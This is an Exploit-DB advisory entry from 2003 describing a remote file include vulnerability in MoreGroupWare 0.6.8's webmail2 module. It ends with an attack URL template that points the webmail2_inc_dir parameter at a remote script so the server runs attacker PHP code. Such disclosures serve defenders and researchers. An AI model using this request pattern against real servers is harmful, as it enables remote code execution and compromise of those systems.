MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include Vulnerability

2003-07-21T00:00:00
ID EDB-ID:22948
Type exploitdb
Reporter phil dunn
Modified 2003-07-21T00:00:00

Description

MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/8249/info

moregroupware is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a moregroupware URI variable. This variable is used in the include path for several moregroupware configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed.

http://www.example.com/moregroupware/modules/webmail2/inc/[vuln file]?webmail2_inc_dir=[remote include]